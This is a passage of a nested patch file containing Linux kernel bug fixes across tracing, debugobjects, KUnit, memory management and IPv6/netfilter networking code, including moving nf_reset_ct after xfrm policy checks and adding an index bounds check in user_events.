+ 	 */
+ 	if (tick_nohz_full_running && tick_do_timer_cpu == cpu)
+-		return -EBUSY;
+-	return 0;
++		return false;
++	return true;
++}
++
++static int tick_nohz_cpu_down(unsigned int cpu)
++{
++	return tick_nohz_cpu_hotpluggable(cpu) ? 0 : -EBUSY;
+ }
+ 
+ void __init tick_nohz_init(void)
+diff --git a/kernel/time/timekeeping.c b/kernel/time/timekeeping.c
+index 5579ead449f25..09d594900ee0b 100644
+--- a/kernel/time/timekeeping.c
++++ b/kernel/time/timekeeping.c
+@@ -526,7 +526,7 @@ EXPORT_SYMBOL_GPL(ktime_get_raw_fast_ns);
+  * partially updated.  Since the tk->offs_boot update is a rare event, this
+  * should be a rare occurrence which postprocessing should be able to handle.
+  *
+- * The caveats vs. timestamp ordering as documented for ktime_get_fast_ns()
++ * The caveats vs. timestamp ordering as documented for ktime_get_mono_fast_ns()
+  * apply as well.
+  */
+ u64 notrace ktime_get_boot_fast_ns(void)
+@@ -576,7 +576,7 @@ static __always_inline u64 __ktime_get_real_fast(struct tk_fast *tkf, u64 *mono)
+ /**
+  * ktime_get_real_fast_ns: - NMI safe and fast access to clock realtime.
+  *
+- * See ktime_get_fast_ns() for documentation of the time stamp ordering.
++ * See ktime_get_mono_fast_ns() for documentation of the time stamp ordering.
+  */
+ u64 ktime_get_real_fast_ns(void)
+ {
+diff --git a/kernel/trace/ring_buffer.c b/kernel/trace/ring_buffer.c
+index 12da17243747d..6f8b9e3b144c6 100644
+--- a/kernel/trace/ring_buffer.c
++++ b/kernel/trace/ring_buffer.c
+@@ -1778,6 +1778,8 @@ static void rb_free_cpu_buffer(struct ring_buffer_per_cpu *cpu_buffer)
+ 	struct list_head *head = cpu_buffer->pages;
+ 	struct buffer_page *bpage, *tmp;
+ 
++	irq_work_sync(&cpu_buffer->irq_work.work);
++
+ 	free_buffer_page(cpu_buffer->reader_page);
+ 
+ 	if (head) {
+@@ -1884,6 +1886,8 @@ ring_buffer_free(struct trace_buffer *buffer)
+ 
+ 	cpuhp_state_remove_instance(CPUHP_TRACE_RB_PREPARE, &buffer->node);
+ 
++	irq_work_sync(&buffer->irq_work.work);
++
+ 	for_each_buffer_cpu(buffer, cpu)
+ 		rb_free_cpu_buffer(buffer->buffers[cpu]);
+ 
+@@ -5349,6 +5353,9 @@ void ring_buffer_reset_cpu(struct trace_buffer *buffer, int cpu)
+ }
+ EXPORT_SYMBOL_GPL(ring_buffer_reset_cpu);
+ 
++/* Flag to ensure proper resetting of atomic variables */
++#define RESET_BIT	(1 << 30)
++
+ /**
+  * ring_buffer_reset_online_cpus - reset a ring buffer per CPU buffer
+  * @buffer: The ring buffer to reset a per cpu buffer of
+@@ -5365,20 +5372,27 @@ void ring_buffer_reset_online_cpus(struct trace_buffer *buffer)
+ 	for_each_online_buffer_cpu(buffer, cpu) {
+ 		cpu_buffer = buffer->buffers[cpu];
+ 
+-		atomic_inc(&cpu_buffer->resize_disabled);
++		atomic_add(RESET_BIT, &cpu_buffer->resize_disabled);
+ 		atomic_inc(&cpu_buffer->record_disabled);
+ 	}
+ 
+ 	/* Make sure all commits have finished */
+ 	synchronize_rcu();
+ 
+-	for_each_online_buffer_cpu(buffer, cpu) {
++	for_each_buffer_cpu(buffer, cpu) {
+ 		cpu_buffer = buffer->buffers[cpu];
+ 
++		/*
++		 * If a CPU came online during the synchronize_rcu(), then
++		 * ignore it.
++		 */
++		if (!(atomic_read(&cpu_buffer->resize_disabled) & RESET_BIT))
++			continue;
++
+ 		reset_disabled_cpu_buffer(cpu_buffer);
+ 
+ 		atomic_dec(&cpu_buffer->record_disabled);
+-		atomic_dec(&cpu_buffer->resize_disabled);
++		atomic_sub(RESET_BIT, &cpu_buffer->resize_disabled);
+ 	}
+ 
+ 	mutex_unlock(&buffer->mutex);
+diff --git a/kernel/trace/trace.c b/kernel/trace/trace.c
+index 13b324f008256..a61a96569ef5a 100644
+--- a/kernel/trace/trace.c
++++ b/kernel/trace/trace.c
+@@ -9621,7 +9621,7 @@ init_tracer_tracefs(struct trace_array *tr, struct dentry *d_tracer)
+ 
+ 	tr->buffer_percent = 50;
+ 
+-	trace_create_file("buffer_percent", TRACE_MODE_READ, d_tracer,
++	trace_create_file("buffer_percent", TRACE_MODE_WRITE, d_tracer,
+ 			tr, &buffer_percent_fops);
+ 
+ 	create_trace_options_dir(tr);
+diff --git a/kernel/trace/trace_events_user.c b/kernel/trace/trace_events_user.c
+index 908e8a13c675b..625cab4b9d945 100644
+--- a/kernel/trace/trace_events_user.c
++++ b/kernel/trace/trace_events_user.c
+@@ -1398,6 +1398,9 @@ static ssize_t user_events_write_core(struct file *file, struct iov_iter *i)
+ 	if (unlikely(copy_from_iter(&idx, sizeof(idx), i) != sizeof(idx)))
+ 		return -EFAULT;
+ 
++	if (idx < 0)
++		return -EINVAL;
++
+ 	rcu_read_lock_sched();
+ 
+ 	refs = rcu_dereference_sched(info->refs);
+diff --git a/kernel/workqueue.c b/kernel/workqueue.c
+index 76ea87b0251ce..e5421775deb38 100644
+--- a/kernel/workqueue.c
++++ b/kernel/workqueue.c
+@@ -4850,10 +4850,16 @@ static void show_one_worker_pool(struct worker_pool *pool)
+ 	struct worker *worker;
+ 	bool first = true;
+ 	unsigned long flags;
++	unsigned long hung = 0;
+ 
+ 	raw_spin_lock_irqsave(&pool->lock, flags);
+ 	if (pool->nr_workers == pool->nr_idle)
+ 		goto next_pool;
++
++	/* How long the first pending work is waiting for a worker. */
++	if (!list_empty(&pool->worklist))
++		hung = jiffies_to_msecs(jiffies - pool->watchdog_ts) / 1000;
++
+ 	/*
+ 	 * Defer printing to avoid deadlocks in console drivers that
+ 	 * queue work while holding locks also taken in their write
+@@ -4862,9 +4868,7 @@ static void show_one_worker_pool(struct worker_pool *pool)
+ 	printk_deferred_enter();
+ 	pr_info("pool %d:", pool->id);
+ 	pr_cont_pool_info(pool);
+-	pr_cont(" hung=%us workers=%d",
+-		jiffies_to_msecs(jiffies - pool->watchdog_ts) / 1000,
+-		pool->nr_workers);
++	pr_cont(" hung=%lus workers=%d", hung, pool->nr_workers);
+ 	if (pool->manager)
+ 		pr_cont(" manager: %d",
+ 			task_pid_nr(pool->manager->task));
+diff --git a/lib/debugobjects.c b/lib/debugobjects.c
+index df86e649d8be0..003edc5ebd673 100644
+--- a/lib/debugobjects.c
++++ b/lib/debugobjects.c
+@@ -216,10 +216,6 @@ static struct debug_obj *__alloc_object(struct hlist_head *list)
+ 	return obj;
+ }
+ 
+-/*
+- * Allocate a new object. If the pool is empty, switch off the debugger.
+- * Must be called with interrupts disabled.
+- */
+ static struct debug_obj *
+ alloc_object(void *addr, struct debug_bucket *b, const struct debug_obj_descr *descr)
+ {
+@@ -552,36 +548,74 @@ static void debug_object_is_on_stack(void *addr, int onstack)
+ 	WARN_ON(1);
+ }
+ 
+-static void
+-__debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack)
++static struct debug_obj *lookup_object_or_alloc(void *addr, struct debug_bucket *b,
++						const struct debug_obj_descr *descr,
++						bool onstack, bool alloc_ifstatic)
+ {
+-	enum debug_obj_state state;
+-	bool check_stack = false;
+-	struct debug_bucket *db;
+-	struct debug_obj *obj;
+-	unsigned long flags;
++	struct debug_obj *obj = lookup_object(addr, b);
++	enum debug_obj_state state = ODEBUG_STATE_NONE;
++
++	if (likely(obj))
++		return obj;
++
++	/*
++	 * debug_object_init() unconditionally allocates untracked
++	 * objects. It does not matter whether it is a static object or
++	 * not.
++	 *
++	 * debug_object_assert_init() and debug_object_activate() allow
++	 * allocation only if the descriptor callback confirms that the
++	 * object is static and considered initialized. For non-static
++	 * objects the allocation needs to be done from the fixup callback.
++	 */
++	if (unlikely(alloc_ifstatic)) {
++		if (!descr->is_static_object || !descr->is_static_object(addr))
++			return ERR_PTR(-ENOENT);
++		/* Statically allocated objects are considered initialized */
++		state = ODEBUG_STATE_INIT;
++	}
++
++	obj = alloc_object(addr, b, descr);
++	if (likely(obj)) {
++		obj->state = state;
++		debug_object_is_on_stack(addr, onstack);
++		return obj;
++	}
++
++	/* Out of memory. Do the cleanup outside of the locked region */
++	debug_objects_enabled = 0;
++	return NULL;
++}
+ 
++static void debug_objects_fill_pool(void)
++{
+ 	/*
+ 	 * On RT enabled kernels the pool refill must happen in preemptible
+ 	 * context:
+ 	 */
+ 	if (!IS_ENABLED(CONFIG_PREEMPT_RT) || preemptible())
+ 		fill_pool();
++}
++
++static void
++__debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack)
++{
++	enum debug_obj_state state;
++	struct debug_bucket *db;
++	struct debug_obj *obj;
++	unsigned long flags;
++
++	debug_objects_fill_pool();
+ 
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+-	obj = lookup_object(addr, db);
+-	if (!obj) {
+-		obj = alloc_object(addr, db, descr);
+-		if (!obj) {
+-			debug_objects_enabled = 0;
+-			raw_spin_unlock_irqrestore(&db->lock, flags);
+-			debug_objects_oom();
+-			return;
+-		}
+-		check_stack = true;
++	obj = lookup_object_or_alloc(addr, db, descr, onstack, false);
++	if (unlikely(!obj)) {
++		raw_spin_unlock_irqrestore(&db->lock, flags);
++		debug_objects_oom();
++		return;
+ 	}
+ 
+ 	switch (obj->state) {
+@@ -607,8 +641,6 @@ __debug_object_init(void *addr, const struct debug_obj_descr *descr, int onstack
+ 	}
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+-	if (check_stack)
+-		debug_object_is_on_stack(addr, onstack);
+ }
+ 
+ /**
+@@ -648,24 +680,24 @@ EXPORT_SYMBOL_GPL(debug_object_init_on_stack);
+  */
+ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	enum debug_obj_state state;
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+ 	int ret;
+-	struct debug_obj o = { .object = addr,
+-			       .state = ODEBUG_STATE_NOTAVAILABLE,
+-			       .descr = descr };
+ 
+ 	if (!debug_objects_enabled)
+ 		return 0;
+ 
++	debug_objects_fill_pool();
++
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
+ 
+-	obj = lookup_object(addr, db);
+-	if (obj) {
++	obj = lookup_object_or_alloc(addr, db, descr, false, true);
++	if (likely(!IS_ERR_OR_NULL(obj))) {
+ 		bool print_object = false;
+ 
+ 		switch (obj->state) {
+@@ -698,24 +730,16 @@ int debug_object_activate(void *addr, const struct debug_obj_descr *descr)
+ 
+ 	raw_spin_unlock_irqrestore(&db->lock, flags);
+ 
+-	/*
+-	 * We are here when a static object is activated. We
+-	 * let the type specific code confirm whether this is
+-	 * true or not. if true, we just make sure that the
+-	 * static object is tracked in the object tracker. If
+-	 * not, this must be a bug, so we try to fix it up.
+-	 */
+-	if (descr->is_static_object && descr->is_static_object(addr)) {
+-		/* track this static object */
+-		debug_object_init(addr, descr);
+-		debug_object_activate(addr, descr);
+-	} else {
+-		debug_print_object(&o, "activate");
+-		ret = debug_object_fixup(descr->fixup_activate, addr,
+-					ODEBUG_STATE_NOTAVAILABLE);
+-		return ret ? 0 : -EINVAL;
++	/* If NULL the allocation has hit OOM */
++	if (!obj) {
++		debug_objects_oom();
++		return 0;
+ 	}
+-	return 0;
++
++	/* Object is neither static nor tracked. It's not initialized */
++	debug_print_object(&o, "activate");
++	ret = debug_object_fixup(descr->fixup_activate, addr, ODEBUG_STATE_NOTAVAILABLE);
++	return ret ? 0 : -EINVAL;
+ }
+ EXPORT_SYMBOL_GPL(debug_object_activate);
+ 
+@@ -869,6 +893,7 @@ EXPORT_SYMBOL_GPL(debug_object_free);
+  */
+ void debug_object_assert_init(void *addr, const struct debug_obj_descr *descr)
+ {
++	struct debug_obj o = { .object = addr, .state = ODEBUG_STATE_NOTAVAILABLE, .descr = descr };
+ 	struct debug_bucket *db;
+ 	struct debug_obj *obj;
+ 	unsigned long flags;
+@@ -876,34 +901,25 @@ void debug_object_assert_init(void *addr, const struct debug_obj_descr *descr)
+ 	if (!debug_objects_enabled)
+ 		return;
+ 
++	debug_objects_fill_pool();
++
+ 	db = get_bucket((unsigned long) addr);
+ 
+ 	raw_spin_lock_irqsave(&db->lock, flags);
++	obj = lookup_object_or_alloc(addr, db, descr, false, true);
++	raw_spin_unlock_irqrestore(&db->lock, flags);
++	if (likely(!IS_ERR_OR_NULL(obj)))
++		return;
+ 
+-	obj = lookup_object(addr, db);
++	/* If NULL the allocation has hit OOM */
+ 	if (!obj) {
+-		struct debug_obj o = { .object = addr,
+-				       .state = ODEBUG_STATE_NOTAVAILABLE,
+-				       .descr = descr };
+-
+-		raw_spin_unlock_irqrestore(&db->lock, flags);
+-		/*
+-		 * Maybe the object is static, and we let the type specific
+-		 * code confirm. Track this static object if true, else invoke
+-		 * fixup.
+-		 */
+-		if (descr->is_static_object && descr->is_static_object(addr)) {
+-			/* Track this static object */
+-			debug_object_init(addr, descr);
+-		} else {
+-			debug_print_object(&o, "assert_init");
+-			debug_object_fixup(descr->fixup_assert_init, addr,
+-					   ODEBUG_STATE_NOTAVAILABLE);
+-		}
++		debug_objects_oom();
+ 		return;
+ 	}
+ 
+-	raw_spin_unlock_irqrestore(&db->lock, flags);
++	/* Object is neither tracked nor static. It's not initialized. */
++	debug_print_object(&o, "assert_init");
++	debug_object_fixup(descr->fixup_assert_init, addr, ODEBUG_STATE_NOTAVAILABLE);
+ }
+ EXPORT_SYMBOL_GPL(debug_object_assert_init);
+ 
+diff --git a/lib/kunit/debugfs.c b/lib/kunit/debugfs.c
+index de0ee2e03ed60..b08bb1fba106d 100644
+--- a/lib/kunit/debugfs.c
++++ b/lib/kunit/debugfs.c
+@@ -55,14 +55,24 @@ static int debugfs_print_results(struct seq_file *seq, void *v)
+ 	enum kunit_status success = kunit_suite_has_succeeded(suite);
+ 	struct kunit_case *test_case;
+ 
+-	if (!suite || !suite->log)
++	if (!suite)
+ 		return 0;
+ 
+-	seq_printf(seq, "%s", suite->log);
++	/* Print KTAP header so the debugfs log can be parsed as valid KTAP. */
++	seq_puts(seq, "KTAP version 1\n");
++	seq_puts(seq, "1..1\n");
++
++	/* Print suite header because it is not stored in the test logs. */
++	seq_puts(seq, KUNIT_SUBTEST_INDENT "KTAP version 1\n");
++	seq_printf(seq, KUNIT_SUBTEST_INDENT "# Subtest: %s\n", suite->name);
++	seq_printf(seq, KUNIT_SUBTEST_INDENT "1..%zd\n", kunit_suite_num_test_cases(suite));
+ 
+ 	kunit_suite_for_each_test_case(suite, test_case)
+ 		debugfs_print_result(seq, suite, test_case);
+ 
++	if (suite->log)
++		seq_printf(seq, "%s", suite->log);
++
+ 	seq_printf(seq, "%s %d %s\n",
+ 		   kunit_status_to_ok_not_ok(success), 1, suite->name);
+ 	return 0;
+diff --git a/lib/kunit/test.c b/lib/kunit/test.c
+index 890ba5b3a9819..820f867e35f40 100644
+--- a/lib/kunit/test.c
++++ b/lib/kunit/test.c
+@@ -152,10 +152,18 @@ EXPORT_SYMBOL_GPL(kunit_suite_num_test_cases);
+ 
+ static void kunit_print_suite_start(struct kunit_suite *suite)
+ {
+-	kunit_log(KERN_INFO, suite, KUNIT_SUBTEST_INDENT "KTAP version 1\n");
+-	kunit_log(KERN_INFO, suite, KUNIT_SUBTEST_INDENT "# Subtest: %s",
++	/*
++	 * We do not log the test suite header as doing so would
++	 * mean the debugfs display would show the test suite
++	 * header before the individual test results.
++	 * Hence we printk the suite header directly, and will
++	 * separately seq_printf() the suite header for the debugfs
++	 * representation.
++	 */
++	pr_info(KUNIT_SUBTEST_INDENT "KTAP version 1\n");
++	pr_info(KUNIT_SUBTEST_INDENT "# Subtest: %s\n",
+ 		  suite->name);
+-	kunit_log(KERN_INFO, suite, KUNIT_SUBTEST_INDENT "1..%zd",
++	pr_info(KUNIT_SUBTEST_INDENT "1..%zd\n",
+ 		  kunit_suite_num_test_cases(suite));
+ }
+ 
+@@ -172,10 +180,9 @@ static void kunit_print_ok_not_ok(void *test_or_suite,
+ 
+ 	/*
+ 	 * We do not log the test suite results as doing so would
+-	 * mean debugfs display would consist of the test suite
+-	 * description and status prior to individual test results.
+-	 * Hence directly printk the suite status, and we will
+-	 * separately seq_printf() the suite status for the debugfs
++	 * mean the debugfs display would show an incorrect test
++	 * number. Hence we printk the suite result directly, and will
++	 * separately seq_printf() the suite results for the debugfs
+ 	 * representation.
+ 	 */
+ 	if (suite)
+diff --git a/mm/kasan/hw_tags.c b/mm/kasan/hw_tags.c
+index b22c4f461cb0b..cc9bc99e47cd1 100644
+--- a/mm/kasan/hw_tags.c
++++ b/mm/kasan/hw_tags.c
+@@ -225,7 +225,7 @@ static void init_vmalloc_pages(const void *start, unsigned long size)
+ 	const void *addr;
+ 
+ 	for (addr = start; addr < start + size; addr += PAGE_SIZE) {
+-		struct page *page = virt_to_page(addr);
++		struct page *page = vmalloc_to_page(addr);
+ 
+ 		clear_highpage_kasan_tagged(page);
+ 	}
+@@ -237,7 +237,7 @@ void *__kasan_unpoison_vmalloc(const void *start, unsigned long size,
+ 	u8 tag;
+ 	unsigned long redzone_start, redzone_size;
+ 
+-	if (!kasan_vmalloc_enabled() || !is_vmalloc_or_module_addr(start)) {
++	if (!kasan_vmalloc_enabled()) {
+ 		if (flags & KASAN_VMALLOC_INIT)
+ 			init_vmalloc_pages(start, size);
+ 		return (void *)start;
+diff --git a/mm/mempolicy.c b/mm/mempolicy.c
+index e132f70a059e8..7d36dd95d1fff 100644
+--- a/mm/mempolicy.c
++++ b/mm/mempolicy.c
+@@ -802,8 +802,10 @@ static int mbind_range(struct vma_iterator *vmi, struct vm_area_struct *vma,
+ 		vmstart = vma->vm_start;
+ 	}
+ 
+-	if (mpol_equal(vma_policy(vma), new_pol))
++	if (mpol_equal(vma_policy(vma), new_pol)) {
++		*prev = vma;
+ 		return 0;
++	}
+ 
+ 	pgoff = vma->vm_pgoff + ((vmstart - vma->vm_start) >> PAGE_SHIFT);
+ 	merged = vma_merge(vma->vm_mm, *prev, vmstart, vmend, vma->vm_flags,
+diff --git a/mm/vmscan.c b/mm/vmscan.c
+index 5b7b8d4f5297f..8168fee6a85b9 100644
+--- a/mm/vmscan.c
++++ b/mm/vmscan.c
+@@ -1905,6 +1905,16 @@ retry:
+ 			}
+ 		}
+ 
++		/*
++		 * Folio is unmapped now so it cannot be newly pinned anymore.
++		 * No point in trying to reclaim folio if it is pinned.
++		 * Furthermore we don't want to reclaim underlying fs metadata
++		 * if the folio is pinned and thus potentially modified by the
++		 * pinning process as that may upset the filesystem.
++		 */
++		if (folio_maybe_dma_pinned(folio))
++			goto activate_locked;
++
+ 		mapping = folio_mapping(folio);
+ 		if (folio_test_dirty(folio)) {
+ 			/*
+diff --git a/net/8021q/vlan_dev.c b/net/8021q/vlan_dev.c
+index 296d0145932f4..5920544e93e82 100644
+--- a/net/8021q/vlan_dev.c
++++ b/net/8021q/vlan_dev.c
+@@ -365,7 +365,7 @@ static int vlan_dev_ioctl(struct net_device *dev, struct ifreq *ifr, int cmd)
+ 
+ 	switch (cmd) {
+ 	case SIOCSHWTSTAMP:
+-		if (!net_eq(dev_net(dev), &init_net))
++		if (!net_eq(dev_net(dev), dev_net(real_dev)))
+ 			break;
+ 		fallthrough;
+ 	case SIOCGMIIPHY:
+diff --git a/net/core/bpf_sk_storage.c b/net/core/bpf_sk_storage.c
+index bb378c33f542c..6a4b3e9313241 100644
+--- a/net/core/bpf_sk_storage.c
++++ b/net/core/bpf_sk_storage.c
+@@ -100,8 +100,8 @@ static void *bpf_fd_sk_storage_lookup_elem(struct bpf_map *map, void *key)
+ 	return ERR_PTR(err);
+ }
+ 
+-static int bpf_fd_sk_storage_update_elem(struct bpf_map *map, void *key,
+-					 void *value, u64 map_flags)
++static long bpf_fd_sk_storage_update_elem(struct bpf_map *map, void *key,
++					  void *value, u64 map_flags)
+ {
+ 	struct bpf_local_storage_data *sdata;
+ 	struct socket *sock;
+@@ -120,7 +120,7 @@ static int bpf_fd_sk_storage_update_elem(struct bpf_map *map, void *key,
+ 	return err;
+ }
+ 
+-static int bpf_fd_sk_storage_delete_elem(struct bpf_map *map, void *key)
++static long bpf_fd_sk_storage_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct socket *sock;
+ 	int fd, err;
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index 43e1b89695c22..6f5ef18a8b772 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -5038,6 +5038,9 @@ void __skb_tstamp_tx(struct sk_buff *orig_skb,
+ 			skb = alloc_skb(0, GFP_ATOMIC);
+ 	} else {
+ 		skb = skb_clone(orig_skb, GFP_ATOMIC);
++
++		if (skb_orphan_frags_rx(skb, GFP_ATOMIC))
++			return;
+ 	}
+ 	if (!skb)
+ 		return;
+diff --git a/net/core/sock_map.c b/net/core/sock_map.c
+index a68a7290a3b2b..a055139f410e2 100644
+--- a/net/core/sock_map.c
++++ b/net/core/sock_map.c
+@@ -437,7 +437,7 @@ static void sock_map_delete_from_link(struct bpf_map *map, struct sock *sk,
+ 	__sock_map_delete(stab, sk, link_raw);
+ }
+ 
+-static int sock_map_delete_elem(struct bpf_map *map, void *key)
++static long sock_map_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_stab *stab = container_of(map, struct bpf_stab, map);
+ 	u32 i = *(u32 *)key;
+@@ -587,8 +587,8 @@ out:
+ 	return ret;
+ }
+ 
+-static int sock_map_update_elem(struct bpf_map *map, void *key,
+-				void *value, u64 flags)
++static long sock_map_update_elem(struct bpf_map *map, void *key,
++				 void *value, u64 flags)
+ {
+ 	struct sock *sk = (struct sock *)value;
+ 	int ret;
+@@ -916,7 +916,7 @@ static void sock_hash_delete_from_link(struct bpf_map *map, struct sock *sk,
+ 	raw_spin_unlock_bh(&bucket->lock);
+ }
+ 
+-static int sock_hash_delete_elem(struct bpf_map *map, void *key)
++static long sock_hash_delete_elem(struct bpf_map *map, void *key)
+ {
+ 	struct bpf_shtab *htab = container_of(map, struct bpf_shtab, map);
+ 	u32 hash, key_size = map->key_size;
+diff --git a/net/dccp/ipv6.c b/net/dccp/ipv6.c
+index b9d7c3dd1cb39..c0fd8f5f3b94e 100644
+--- a/net/dccp/ipv6.c
++++ b/net/dccp/ipv6.c
+@@ -783,6 +783,7 @@ lookup:
+ 
+ 	if (!xfrm6_policy_check(sk, XFRM_POLICY_IN, skb))
+ 		goto discard_and_relse;
++	nf_reset_ct(skb);
+ 
+ 	return __sk_receive_skb(sk, skb, 1, dh->dccph_doff * 4,
+ 				refcounted) ? -1 : 0;
+diff --git a/net/ipv4/ip_output.c b/net/ipv4/ip_output.c
+index 922c87ef1ab58..2a07588265c70 100644
+--- a/net/ipv4/ip_output.c
++++ b/net/ipv4/ip_output.c
+@@ -1570,9 +1570,19 @@ struct sk_buff *__ip_make_skb(struct sock *sk,
+ 	cork->dst = NULL;
+ 	skb_dst_set(skb, &rt->dst);
+ 
+-	if (iph->protocol == IPPROTO_ICMP)
+-		icmp_out_count(net, ((struct icmphdr *)
+-			skb_transport_header(skb))->type);
++	if (iph->protocol == IPPROTO_ICMP) {
++		u8 icmp_type;
++
++		/* For such sockets, transhdrlen is zero when doing ip_append_data(),
++		 * so the icmphdr is not in the skb linear region and the icmp_type
++		 * cannot be obtained via icmp_hdr(skb)->type.
++		 */
++		if (sk->sk_type == SOCK_RAW && !inet_sk(sk)->hdrincl)
++			icmp_type = fl4->fl4_icmp_type;
++		else
++			icmp_type = icmp_hdr(skb)->type;
++		icmp_out_count(net, icmp_type);
++	}
+ 
+ 	ip_cork_release(cork);
+ out:
+diff --git a/net/ipv6/ip6_input.c b/net/ipv6/ip6_input.c
+index e1ebf5e42ebe9..d94041bb42872 100644
+--- a/net/ipv6/ip6_input.c
++++ b/net/ipv6/ip6_input.c
+@@ -404,10 +404,6 @@ resubmit_final:
+ 			/* Only do this once for first final protocol */
+ 			have_final = true;
+ 
+-			/* Free reference early: we don't need it any more,
+-			   and it may hold ip_conntrack module loaded
+-			   indefinitely. */
+-			nf_reset_ct(skb);
+ 
+ 			skb_postpull_rcsum(skb, skb_network_header(skb),
+ 					   skb_network_header_len(skb));
+@@ -430,10 +426,12 @@ resubmit_final:
+ 				goto discard;
+ 			}
+ 		}
+-		if (!(ipprot->flags & INET6_PROTO_NOPOLICY) &&
+-		    !xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) {
+-			SKB_DR_SET(reason, XFRM_POLICY);
+-			goto discard;
++		if (!(ipprot->flags & INET6_PROTO_NOPOLICY)) {
++			if (!xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb)) {
++				SKB_DR_SET(reason, XFRM_POLICY);
++				goto discard;
++			}
++			nf_reset_ct(skb);
+ 		}
+ 
+ 		ret = INDIRECT_CALL_2(ipprot->handler, tcp_v6_rcv, udpv6_rcv,
+diff --git a/net/ipv6/raw.c b/net/ipv6/raw.c
+index 4fc511bdf176c..f44b99f7ecdcc 100644
+--- a/net/ipv6/raw.c
++++ b/net/ipv6/raw.c
+@@ -193,10 +193,8 @@ static bool ipv6_raw_deliver(struct sk_buff *skb, int nexthdr)
+ 			struct sk_buff *clone = skb_clone(skb, GFP_ATOMIC);
+ 
+ 			/* Not releasing hash table! */
+-			if (clone) {
+-				nf_reset_ct(clone);
++			if (clone)
+ 				rawv6_rcv(sk, clone);
+-			}
+ 		}
+ 	}
+ 	rcu_read_unlock();
+@@ -387,6 +385,7 @@ int rawv6_rcv(struct sock *sk, struct sk_buff *skb)
+ 		kfree_skb(skb);
+ 		return NET_RX_DROP;
+ 	}
++	nf_reset_ct(skb);
+ 
+ 	if (!rp->checksum)
+ 		skb->ip_summed = CHECKSUM_UNNECESSARY;
+diff --git a/net/ipv6/tcp_ipv6.c b/net/ipv6/tcp_ipv6.c
+index a52a4f12f1467..e4da7267ed4bd 100644
+--- a/net/ipv6/tcp_ipv6.c
++++ b/net/ipv6/tcp_ipv6.c
+@@ -1721,6 +1721,8 @@ process:
+ 	if (drop_reason)
+ 		goto discard_and_relse;
+ 
++	nf_reset_ct(skb);
++
+ 	if (tcp_filter(sk, skb)) {
+ 		drop_reason = SKB_DROP_REASON_SOCKET_FILTER;
+ 		goto discard_and_relse;
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index a675acfb901d1..c519f21632656 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -704,6 +704,7 @@ static int udpv6_queue_rcv_one_skb(struct sock *sk, struct sk_buff *skb)
+ 		drop_reason = SKB_DROP_REASON_XFRM_POLICY;
+ 		goto drop;
+ 	}
++	nf_reset_ct(skb);
+ 
+ 	if (static_branch_unlikely(&udpv6_encap_needed_key) && up->encap_type) {
+ 		int (*encap_rcv)(struct sock *sk, struct sk_buff *skb);
+@@ -1027,6 +1028,7 @@ int __udp6_lib_rcv(struct sk_buff *skb, struct udp_table *udptable,
+ 
+ 	if (!xfrm6_policy_check(NULL, XFRM_POLICY_IN, skb))
+ 		goto discard;
++	nf_reset_ct(skb);
+ 
+ 	if (udp_lib_checksum_complete(skb))
+ 		goto csum_error;
+diff --git a/net/netfilter/nf_conntrack_bpf.c b/net/netfilter/nf_conntrack_bpf.c
+index e1af14e3b63c5..24002bc61e07e 100644
+--- a/net/netfilter/nf_conntrack_bpf.c
++++ b/net/netfilter/nf_conntrack_bpf.c
+@@ -381,6 +381,7 @@ struct nf_conn *bpf_ct_insert_entry(struct nf_conn___init *nfct_i)
+ 	struct nf_conn *nfct = (struct nf_conn *)nfct_i;
+ 	int err;
+ 
++	nfct->status |= IPS_CONFIRMED;
+ 	err = nf_conntrack_hash_check_insert(nfct);
+ 	if (err < 0) {
+ 		nf_conntrack_free(nfct);
+diff --git a/net/netfilter/nf_conntrack_core.c b/net/netfilter/nf_conntrack_core.c
+index 19e3afb23fdaf..cf731546e865b 100644
+--- a/net/netfilter/nf_conntrack_core.c
++++ b/net/netfilter/nf_conntrack_core.c
+@@ -934,7 +934,6 @@ nf_conntrack_hash_check_insert(struct nf_conn *ct)
+ 		goto out;
+ 	}
+ 
+-	ct->status |= IPS_CONFIRMED;
+ 	smp_wmb();
+ 	/* The caller holds a reference to this object */
+ 	refcount_set(&ct->ct_general.use, 2);
+diff --git a/net/netfilter/nf_conntrack_netlink.c b/net/netfilter/nf_conntrack_netlink.c
+index d095d3c1ceca6..cb4325b8ebb11 100644
+--- a/net/netfilter/nf_conntrack_netlink.c
++++ b/net/netfilter/nf_conntrack_netlink.c
+@@ -176,7 +176,12 @@ nla_put_failure:
+ static int ctnetlink_dump_timeout(struct sk_buff *skb, const struct nf_conn *ct,
+ 				  bool skip_zero)
+ {
+-	long timeout = nf_ct_expires(ct) / HZ;
++	long timeout;
++
++	if (nf_ct_is_confirmed(ct))
++		timeout = nf_ct_expires(ct) / HZ;
++	else
++		timeout = ct->timeout / HZ;
+ 
+ 	if (skip_zero && timeout == 0)
+ 		return 0;
+@@ -2253,9 +2258,6 @@ ctnetlink_create_conntrack(struct net *net,
+ 	if (!cda[CTA_TIMEOUT])
+ 		goto err1;
+ 
+-	timeout = (u64)ntohl(nla_get_be32(cda[CTA_TIMEOUT])) * HZ;
+-	__nf_ct_set_timeout(ct, timeout);
+-
+ 	rcu_read_lock();
+  	if (cda[CTA_HELP]) {
+ 		char *helpname = NULL;
+@@ -2316,6 +2318,12 @@ ctnetlink_create_conntrack(struct net *net,
+ 	nfct_seqadj_ext_add(ct);
+ 	nfct_synproxy_ext_add(ct);
+ 
++	/* we must add conntrack extensions before confirmation. */
